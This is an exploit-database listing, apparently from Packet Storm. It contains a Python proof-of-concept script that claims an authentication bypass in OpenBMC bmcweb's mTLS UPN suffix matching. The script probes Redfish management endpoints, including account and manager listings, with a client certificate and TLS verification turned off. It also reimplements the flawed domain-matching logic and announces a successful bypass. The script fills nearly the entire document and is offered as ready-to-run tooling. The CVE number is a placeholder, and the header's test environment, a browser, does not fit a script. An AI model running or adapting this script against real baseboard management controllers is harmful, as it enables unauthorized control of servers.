Share
## https://sploitus.com/exploit?id=PACKETSTORM:225451
==================================================================================================================================
    | # Title     : OpenBMC bmcweb AUTH-F6 mTLS UPN Suffix Authentication bypass via parent-domain certificate                       |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://github.com/openbmc                                                                                       |
    ==================================================================================================================================
    
    [+] Summary    : a Python PoC-style security test script for OpenBMC mTLS authentication issue labeled β€œAUTH-F6 UPN suffix bypass”.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import ssl
    import sys
    import requests
    import urllib3
    from urllib.parse import urljoin
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class BMCWebAuthBypass:
        def __init__(self, target, port=443, use_ssl=True, verbose=False):
            self.target = target
            self.port = port
            self.use_ssl = use_ssl
            self.verbose = verbose
            self.base_url = f"{'https' if use_ssl else 'http'}://{target}:{port}"
            self.session = requests.Session()
            self.session.verify = False
            
        def log(self, msg, level="INFO"):
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def setup_mtls(self, cert_file, key_file):
            """Setup mTLS with client certificate"""
            try:
                self.session.cert = (cert_file, key_file)
                self.log(f"Loaded client certificate from {cert_file}", "SUCCESS")
                return True
            except Exception as e:
                self.log(f"Failed to load certificate: {e}", "ERROR")
                return False
        
        def test_authentication(self):
            """Test if authentication succeeds with the certificate"""
            endpoints = [
                '/redfish/v1/Systems',
                '/redfish/v1/Managers',
                '/redfish/v1/SessionService/Sessions',
                '/redfish/v1/Chassis',
                '/redfish/v1/AccountService/Accounts'
            ]
            
            for endpoint in endpoints:
                url = urljoin(self.base_url, endpoint)
                self.log(f"Testing access to {url}")
                
                try:
                    response = self.session.get(url, timeout=10)
                    
                    if response.status_code == 200:
                        self.log(f"SUCCESS! Access granted to {endpoint}", "SUCCESS")
    
                        try:
                            data = response.json()
                            self.log(f"Response data: {list(data.keys()) if data else 'empty'}")
                        except:
                            pass
                        
                        return True
                    elif response.status_code == 401:
                        self.log(f"Access denied to {endpoint} (HTTP 401)")
                    else:
                        self.log(f"Response: HTTP {response.status_code}")
                        
                except Exception as e:
                    self.log(f"Error: {e}", "WARNING")
            
            return False
        
        def check_upn_matching(self, upn_email, target_domain=None):
            """Check if UPN matches target domain (vulnerable algorithm)"""
            
            if not target_domain:
                target_domain = self.target
            if '@' not in upn_email:
                self.log(f"Invalid UPN format: {upn_email}", "ERROR")
                return False
            
            user_part, upn_domain = upn_email.split('@')
            upn_labels = upn_domain.split('.')
            target_labels = target_domain.split('.')
            
            self.log(f"UPN domain: {upn_domain}")
            self.log(f"Target domain: {target_domain}")
            upn_idx = len(upn_labels) - 1
            target_idx = len(target_labels) - 1
            
            matching = True
            while upn_idx >= 0 and target_idx >= 0:
                if upn_labels[upn_idx] != target_labels[target_idx]:
                    matching = False
                    break
                upn_idx -= 1
                target_idx -= 1
            result = matching or upn_idx < 0
            
            self.log(f"Vulnerable algorithm result: {result}")
            
            if result:
                self.log("Certificate would authenticate for this domain (VULNERABLE)", "WARNING")
            else:
                self.log("Certificate would NOT authenticate (safe)")
            
            return result
        
        def run(self, cert_file=None, key_file=None, upn_email=None):
            """Main exploit routine"""
            
            self.log(f"Target: {self.base_url}")
            
            if cert_file and key_file:
                if not self.setup_mtls(cert_file, key_file):
                    return False
                if self.test_authentication():
                    self.log("Authentication bypass successful!", "SUCCESS")
                    return True
                else:
                    self.log("Authentication failed", "ERROR")
            
            elif upn_email:
                self.check_upn_matching(upn_email)
                return True
            
            else:
                self.log("No certificate or UPN provided", "ERROR")
            
            return False
    
    
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-2026-XXXXX - bmcweb OpenBMC AUTH-F6 mTLS Bypass"
        )
        parser.add_argument("-t", "--target", required=True, help="Target BMC hostname")
        parser.add_argument("-p", "--port", type=int, default=443, help="Port (default: 443)")
        parser.add_argument("--cert", help="Client certificate file (PEM)")
        parser.add_argument("--key", help="Client key file (PEM)")
        parser.add_argument("--upn", help="UPN email to test (e.g., user@com)")
        parser.add_argument("--target-domain", help="Target domain for UPN test")
        parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
        
        args = parser.parse_args()
        
        print("""
    ╔══════════════════════════════════════════════════════════════════╗
    β•‘  CVE-2026-XXXXX - bmcweb OpenBMC AUTH-F6 mTLS UPN Bypass       β•‘
    β•‘  Authentication Bypass via Parent-Domain Certificate            β•‘
    β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
        """)
        
        exploit = BMCWebAuthBypass(
            target=args.target,
            port=args.port,
            verbose=args.verbose
        )
        
        success = exploit.run(
            cert_file=args.cert,
            key_file=args.key,
            upn_email=args.upn
        )
        
        sys.exit(0 if success else 1)
    
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================